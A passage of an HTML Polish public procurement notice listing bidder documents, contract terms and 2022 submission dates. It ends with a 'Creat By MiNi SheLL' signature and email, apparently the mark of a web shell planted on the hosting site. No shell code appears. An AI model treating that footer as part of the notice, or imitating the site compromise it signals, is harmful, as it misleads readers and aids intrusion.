gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania wykonawcy. Dokument, o którym mowa wyżej, powinien być wystawiony nie wcześniej<br/>niż 3 miesiące przed ich złożeniem.<br/>2) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o niepodleganiu<br/>wykluczeniu z postępowania, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego, sporządzonego zgodnie z wzorem stanowiącym załącznik nr 6 do SWZ,<br/>w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie składa każdy z wykonawców,<br/>w przypadku, gdy wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega<br/>na zdolnościach lub sytuacji podmiotów udostepniających zasoby, należy dołączyć oświadczenie<br/>podmiotu udostępniającego zasoby</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej<br/>potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w<br/>okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,<br/>2) wykazu dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których dostawy te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; sporządzonego zgodnie z wzorem stanowiącym załącznik nr 8 do<br/>SWZ - jeżeli wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych wspólnie z innymi wykonawcami, wykaz<br/>dotyczy dostaw, w których wykonaniu wykonawca ten bezpośrednio uczestniczył,<br/>3) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; sporządzonego<br/>zgodnie z wzorem stanowiącym załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)<br/>informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej<br/>potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w<br/>okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,<br/>2) wykazu dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których dostawy te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty dostawy zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; sporządzonego zgodnie z wzorem stanowiącym załącznik nr 8 do<br/>SWZ - jeżeli wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych wspólnie z innymi wykonawcami, wykaz<br/>dotyczy dostaw, w których wykonaniu wykonawca ten bezpośrednio uczestniczył,<br/>3) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; sporządzonego<br/>zgodnie z wzorem stanowiącym załącznik nr 9 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania, odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru,<br/>- w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumenty<br/>składa każdy z wykonawców,<br/>- w przypadku, gdy wykonawca w celu wykazania spełniania warunków udziału w postępowaniu<br/>polega na zdolnościach lub sytuacji podmiotów udostepniających zasoby, należy dołączyć<br/>właściwy dokument podmiotu udostępniającego zasoby.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa wyżej, jeżeli<br/>zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>wykonawca wskazał dane umożliwiające dostęp do tych dokumentów w oświadczeniu, którego<br/>wzór stanowi załącznik nr 4 do SWZ.<br/>2) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>wykonawcy jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w pkt 3,<br/>- w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, składa ten<br/>wykonawca, w którego imieniu działa osoba, której umocowanie do jego reprezentowania nie<br/>wynika z dokumentów, o których mowa w pkt 3,<br/>- w przypadku, gdy wykonawca w celu wykazania spełniania warunków udziału w postępowaniu<br/>polega na zdolnościach lub sytuacji podmiotów udostepniających zasoby, należy dołączyć<br/>dokumenty dotyczące tego podmiotu, jeżeli w imieniu tego podmiotu działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 3.<br/>3) W przypadku, gdy wykonawca w celu wykazania spełniania warunków udziału w<br/>postępowaniu polega na zdolnościach technicznych lub zawodowych podmiotów<br/>udostepniających zasoby, wykonawca jest zobowiązany złożyć wraz z ofertą następujące<br/>oświadczenia i dokumenty:<br/>1) Zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tego podmiotu, o którym mowa w art. 118 ust. 3 ustawy Prawo zamówień publicznych,<br/>– zobowiązanie podmiotu udostępniającego zasoby winno potwierdzać, że stosunek łączący<br/>wykonawcę z podmiotem udostepniającym zasoby gwarantuje rzeczywisty dostęp do tych<br/>zasobów oraz określać w szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących doświadczenia,<br/>zrealizuje dostawy, których wskazane zdolności dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawca jest<br/>zobowiązany złożyć wraz z ofertą następujące oświadczenia i dokumenty: 1. oświadczenie, z<br/>którego wynika, które roboty budowlane wykonają poszczególni wykonawcy, określające zakres<br/>jaki wykona każdy z wykonawców wspólnie ubiegających się o zamówienie, sporządzone<br/>zgodnie z wzorem stanowiącym załącznik nr 6 do SWZ – oświadczenie składa pełnomocnik w imieniu wszystkich wykonawców wspólnie ubiegających się o zamówienie,2. pełnomocnictwo do<br/>reprezentowania wykonawcy wspólnie ubiegającego się o zamówienie w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający przewiduje na wniosek wykonawcy, udzielenie jednorazowej zaliczki na poczet<br/>wykonania zamówienia, w wysokości 5 % całkowitego wynagrodzenia umownego brutto <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający informuje,że przewiduje możliwość dokonania zmian postanowień umowy zawartej<br/>z wybranym wykonawcą w przypadkach określonych w projektowanych postanowieniach umowy<br/>w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy<br/>stanowiących załącznik nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-27 15:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy złożyć za pośrednictwem miniportal.uzp.gov.pl na adres ePUAP: /7u2mx6om6i/skrytka</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-27 15:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zadanie jest finansowane z Rządowego Funduszu Polski Ład

Creat By MiNi SheLL
Email: jattceo@gmail.com